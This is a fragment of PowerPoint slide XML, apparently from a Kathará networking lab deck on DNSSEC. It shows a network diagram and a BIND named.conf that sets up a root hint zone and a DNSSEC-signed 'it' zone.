            <p:cNvPr id="9331" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD51212F-6FE4-84F1-6B7C-9E21EE16BC25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{582CAF39-358F-5FA1-A51E-04E86FC55B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3229794" y="5118807"/>
            <a:ext cx="0" cy="1187467"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD186456-83B2-59BD-870E-0BB58665EADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119449" y="6295882"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{937974DE-D2C9-0538-6123-2C29B4BC389A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="864519" y="6199275"/>
            <a:ext cx="1467069" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.100.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72C15B60-548F-E4BE-DEE7-242142F10709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2241803" y="5652867"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F68D9AC8-8A38-E446-0574-4EB5E8026C34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9223" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78121B2-DA84-450D-1DF2-DBDD3044BCE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9224" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D1CE14-A8D6-AE0A-B1ED-67B2B0127FD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4024669" y="6030411"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9225" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D297580-45DE-FE3D-535A-0FCAEE682DC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9226" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E090752-9589-5917-CF22-A7279207BDFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356808850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93A681-F384-4538-FB26-AE1E8C822D3A}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF63FEB0-E8C7-9798-779B-214D008FA525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1235546"/>
            <a:ext cx="7145435" cy="4111532"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE32C3FB-398B-809E-7FE5-4BCC26A22A64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="991"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include “/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone “.” {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    type hint;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file “/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone “it” {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    type master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file “/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/db.it”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>} </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36913D7B-FE84-470D-EA74-06E77EC3996A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3133" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C69C333-D459-7A51-0755-A0BE1078277E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{530A84C4-E997-5633-1E88-1AD059D5DEBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9FCD0F6-F17E-0A3D-6B76-64FF75409B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309490028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B0524E-8599-0707-587D-E76BAB3F24E8}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
